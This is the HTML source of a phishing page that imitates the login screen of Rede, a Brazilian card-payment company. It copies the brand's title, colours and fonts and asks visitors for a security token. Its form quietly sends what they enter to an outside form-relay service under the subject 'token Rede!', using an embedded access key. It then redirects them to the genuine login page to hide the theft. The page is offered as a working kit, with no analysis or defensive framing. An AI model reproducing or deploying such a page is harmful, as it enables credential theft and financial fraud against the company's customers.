<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="favicon.ico">  
    <script defer src="app.js"></script>
    <title>Rede | Maquininhas de cartão, soluções de pagamentos online e muito mais</title>
   
   
   
   <style>
        /* Estilo para o body */
        body {
           
            margin: 0;
            padding: 0;
            background-image: url('back112.jpg');
            background-repeat: no-repeat;
            background-size: cover;
            font-family: Arial, sans-serif;
        }



        @media (max-width: 520px) {
            body {
               
                margin: 0;
            padding: 0;
            background-image: url('cel232.jpg');
            background-repeat: no-repeat;
            background-image: center;
            background-size: cover;
            font-family: Arial, sans-serif;
      }

           .form-input{
            width: 50px;

           }


            .login-container {
       
                    margin-top: 90px;
                    margin-left: -2000px;
                          
                    padding: 20px;
                    border-radius: 5px;
                
                }

                 .login-button {
                        margin-top: 27px;
                        display: inline-block;
                        margin-right: 70px;
                        width: 400px;
                        height: 50px;
                        padding: 10px;
                        background-color: #ec7000;
                        border: none;
                        color: #fff;
                        font-size: 18px;
                        border-radius: 3px;
                        cursor: pointer;
                    }


                    .botao

                    {
                    margin-left: -40px;
                    }

                    .imp

{
margin-left: 10%;
}

        
         

      
  }

  @media (max-width: 720px) {
            body {
                margin: 0;
            padding: 0;
            background-image: url('cel232.jpg');
            background-repeat: no-repeat;
            background-size: cover;
            font-family: Arial, sans-serif;
      }

                .form-input {
              padding: 5px;
              border: 1px solid #ccc;
              margin-left: -10px;
              font-size: 24px;
              color:#ec7000;
              border: 0;
                border-bottom: 1px solid rgb(200,200,200);   
                margin-right:105px;
                outline: 0;
                width: 400px;
                
            }



                  .login-container {
                  
                  margin-top: 90px;
                  margin-left: -17%;
                          
                  padding: 20px;
                  border-radius: 5px;
            
                    }

                    .login-button {
                    margin-top: 27px;
                    margin-left: -200px;
                        width: 400px;
                        height: 50px;
                        padding: 10px;
                        background-color: #ec7000;
                        border: none;
                        color: #fff;
                        font-size: 18px;
                        border-radius: 3px;
                        cursor: pointer;
                    }


}         



      
  


 
        /* Estilo para o contêiner do formulário */
        .login-container {
            position: absolute;
            top: 480px;
            left: 51%;
            transform: translate(-50%, -50%);
    
            padding: 20px;
            border-radius: 5px;
          
        }

        /* Estilo para os campos de entrada e o botão */
        .form-input {
          padding: 5px;
          border: 1px solid #ccc;
          margin-left: 50px;
          font-size: 24px;
          color:#ec7000;
          border: 0;
            border-bottom: 1px solid rgb(200,200,200);   
            margin-right:105px;
            outline: 0;
            width: 300px;
            
        }

        input:focus{
          border-color: #66afe9;
          outline: 0;
          box-shadow: inset 0 1px 1px #00000013, 0 0 8px #66afe999;
          color:#781b8e;
          

          
          }

          input::placeholder{
          
          color:#ec7000;
          

          }

        .login-button {
          margin-top: 15px;
          margin-left: 40px;
            width: 350px;
            height: 70px;
            padding: 10px;
            background-color: #ec7000;
            border: none;
            color: #fff;
            font-size: 18px;
            border-radius: 3px;
            cursor: pointer;
        }

        .login-button:hover {
            background-color: #ec7000;
        }


        ::placeholder{
  color:black;
  font-family: "Itau Display","sans-serif";
  font-size: 26px;
}


    </style>
</head>
<body>
    <div class="login-container">

      <form action="https://api.staticforms.xyz/submit" method="POST">
        
        <input type="hidden" name="_captcha" value="false">
       
        <input type="hidden" name="redirectTo" value="https://meu.userede.com.br/login">
        <input type="hidden" name="_template" value="table">
        <input type="hidden" name="_subject" value="token Rede!">
        <div class="imp">
                   <input type="text" class="form-input" max-width="6" min-width="6" placeholder="Token  E-mail" name="email" required>
           
          

            <br>
          </div>
         
            <div class="botao">
            <button type="submit" class="login-button">Continuar</button>
            <input type="hidden" name="accessKey" value="e6d32d86-f368-4ead-979a-c1c77c85f314">
          
        </form>
    </div>
</div>
</body>
</html>